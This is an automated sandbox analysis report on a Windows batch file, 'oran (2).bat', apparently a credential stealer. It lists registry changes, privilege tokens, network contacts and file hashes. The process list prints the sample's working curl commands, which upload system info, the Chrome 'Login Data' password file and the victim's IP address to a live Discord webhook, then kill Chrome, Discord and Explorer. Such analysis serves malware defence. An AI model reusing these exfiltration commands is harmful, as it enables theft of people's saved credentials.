Analysis Overview
SHA256
f17a109dff8890fa19ea9f4324c49daabf22d4b5c9386a1a819268f04eb9adeb
Threat Level: Shows suspicious behavior
The file oran (2).bat was found to be: Shows suspicious behavior.
Malicious Activity Summary
Registers COM server for autorun
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Delays execution with timeout.exe
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-28 20:24
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-28 20:24
Reported
2024-05-28 20:27
Platform
win7-20240419-en
Max time kernel
118s
Max time network
124s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2976 wrote to memory of 2176 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\fltMC.exe |
| PID 2976 wrote to memory of 2176 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\fltMC.exe |
| PID 2976 wrote to memory of 2176 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\fltMC.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\oran (2).bat"
C:\Windows\system32\fltMC.exe
fltmc
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-28 20:24
Reported
2024-05-28 20:27
Platform
win10v2004-20240226-en
Max time kernel
142s
Max time network
149s
Command Line
Signatures
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32 | C:\Windows\system32\dxdiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\system32\\dxdiagn.dll" | C:\Windows\system32\dxdiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32 | C:\Windows\system32\dxdiag.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | \??\c:\windows\system32\driverstore\filerepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF | C:\Windows\system32\dxdiag.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_533c8d455025cc59\hdaudbus.PNF | C:\Windows\system32\dxdiag.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\machine.inf_amd64_b748590104fe1c15\machine.PNF | C:\Windows\system32\dxdiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\usbport.inf_amd64_254cd5ae09de6b08\usbport.PNF | C:\Windows\system32\dxdiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF | C:\Windows\system32\dxdiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF | C:\Windows\system32\dxdiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\hdaudbus.inf_amd64_533c8d455025cc59\hdaudbus.PNF | C:\Windows\system32\dxdiag.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_0d06b6638bdb4763\mshdc.PNF | C:\Windows\system32\dxdiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | C:\Windows\system32\dxdiag.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\input.inf_amd64_adeb6424513f60a2\input.PNF | C:\Windows\system32\dxdiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\mshdc.inf_amd64_0d06b6638bdb4763\mshdc.PNF | C:\Windows\system32\dxdiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\machine.inf_amd64_b748590104fe1c15\machine.PNF | C:\Windows\system32\dxdiag.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_254cd5ae09de6b08\usbport.PNF | C:\Windows\system32\dxdiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\input.inf_amd64_adeb6424513f60a2\input.PNF | C:\Windows\system32\dxdiag.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF | C:\Windows\system32\dxdiag.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF | C:\Windows\system32\dxdiag.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | C:\Windows\system32\dxdiag.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF | C:\Windows\system32\dxdiag.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dxdiag.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dxdiag.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\system32\dxdiag.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dxdiag.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\dxdiag.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\dxdiag.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}" | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1 | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID | C:\Windows\system32\dxdiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}" | C:\Windows\system32\dxdiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID\ = "DxDiag.DxDiagClassObject.1" | C:\Windows\system32\dxdiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove\ = "Programmable" | C:\Windows\system32\dxdiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\ = "DxDiagProvider Class" | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7} | C:\Windows\system32\dxdiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\ = "DxDiagClassObject Class" | C:\Windows\system32\dxdiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer\ = "DxDiag.DxDiagClassObject.1" | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32 | C:\Windows\system32\dxdiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\system32\\dxdiagn.dll" | C:\Windows\system32\dxdiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CLSID | C:\Windows\system32\dxdiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer\ = "DxDiag.DxDiagClassObject.1" | C:\Windows\system32\dxdiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ = "DxDiagClassObject Class" | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\CLSID | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1 | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B} | C:\Windows\system32\dxdiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\ = "DxDiagClassObject Class" | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\VersionIndependentProgID | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Windows\system32\calc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{78EE6B3D-7E90-4F79-BBC4-B5E380F4806C} | C:\Windows\system32\dxdiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID\ = "DxDiag.DxDiagClassObject" | C:\Windows\system32\dxdiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\ = "DxDiagProvider Class" | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\ProgID | C:\Windows\system32\dxdiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32 | C:\Windows\system32\dxdiag.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\dxdiag.exe | N/A |
| N/A | N/A | C:\Windows\system32\dxdiag.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\dxdiag.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\oran (2).bat"
C:\Windows\system32\fltMC.exe
fltmc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get LocalDateTime /VALUE 2>NUL
C:\Windows\System32\Wbem\WMIC.exe
wmic os get LocalDateTime /VALUE
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -c "[guid]::NewGuid().ToString()"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "[guid]::NewGuid().ToString()"
C:\Windows\system32\dxdiag.exe
dxdiag /dontskip /whql:off /64bit /t c:\dxdiag.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4240 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\curl.exe
curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\":\"g:b2af19bf-449f-4d89-9b01-30774846a846\"}" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"
C:\Windows\system32\curl.exe
curl -F "file1=@c:\dxdiag.txt" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"
C:\Windows\system32\curl.exe
curl -F "file1=@C:\Users\Admin\Appdata\Local\Google\Chrome\User Data\Default\Login Data" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl ifcfg.me
C:\Windows\system32\curl.exe
curl ifcfg.me
C:\Windows\system32\curl.exe
curl -o x.txt -X POST -H "Content-type: text/plain" --data 191.101.209.39 https://api.thebase64.com/encode?secret=your_secret
C:\Windows\system32\curl.exe
curl -F "[email protected]" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"
C:\Windows\system32\taskkill.exe
taskkill /F /IM explorer.exe :: restart
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe :: restart
C:\Windows\system32\taskkill.exe
taskkill /F /IM discord.exe :: restart
C:\Windows\system32\calc.exe
calc.exe :: restart
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\notepad.exe
notepad.exe :: restart
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| FR | 216.58.215.42:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 42.215.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ifcfg.me | udp |
| US | 34.172.225.131:80 | ifcfg.me | tcp |
| US | 8.8.8.8:53 | 131.225.172.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.thebase64.com | udp |
| US | 172.67.210.100:443 | api.thebase64.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 100.210.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
Files
memory/908-1-0x00007FF8A2163000-0x00007FF8A2165000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_seplbejy.aym.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/908-11-0x00000194EC170000-0x00000194EC192000-memory.dmp
memory/908-14-0x00007FF8A2160000-0x00007FF8A2C21000-memory.dmp
memory/908-15-0x00007FF8A2160000-0x00007FF8A2C21000-memory.dmp
memory/1460-16-0x00000139051B0000-0x00000139051B1000-memory.dmp
memory/1460-18-0x00000139051B0000-0x00000139051B1000-memory.dmp
memory/1460-17-0x00000139051B0000-0x00000139051B1000-memory.dmp
memory/1460-22-0x00000139051B0000-0x00000139051B1000-memory.dmp
memory/1460-28-0x00000139051B0000-0x00000139051B1000-memory.dmp
memory/1460-27-0x00000139051B0000-0x00000139051B1000-memory.dmp
memory/1460-26-0x00000139051B0000-0x00000139051B1000-memory.dmp
memory/1460-25-0x00000139051B0000-0x00000139051B1000-memory.dmp
memory/1460-24-0x00000139051B0000-0x00000139051B1000-memory.dmp
memory/1460-23-0x00000139051B0000-0x00000139051B1000-memory.dmp
\??\c:\dxdiag.txt
| MD5 | 14f366966c1763605aa6939cfe9ea0cd |
| SHA1 | 86b247165b6dda23a8fe57541c5f5db1f35ed901 |
| SHA256 | c0915a684ece3e7ab8c60a9787fa1a81a8c492ab0041af0a8e6b9ff1618efafa |
| SHA512 | 538fda37a1245ed5bf9f4dfbdb032ac732f50af201a37febf9abb640d7b9b1b5f982084655fa37156fa290baccd37a55da864b6e20fb0628bcbec815794c1bdd |
C:\Users\Admin\AppData\Local\Temp\x.txt
| MD5 | 69a7bf89dc20b524780cbb7447e34e9f |
| SHA1 | b824ed67b6741a0a94b8f2cc89449f3b783fb9de |
| SHA256 | b36eceb65ade81a9c859af73ce6cfa2a756c85cc9461d523df36546fadd32d44 |
| SHA512 | f1ae5eabecaa4b15c2d9b38f6565c48636b6bc1a70fae4a2aa5b4d7b1215d886663b6a2f9c813fb1ef7af3b467cd3fe3bb5276c12b01aa07087237dd373fa780 |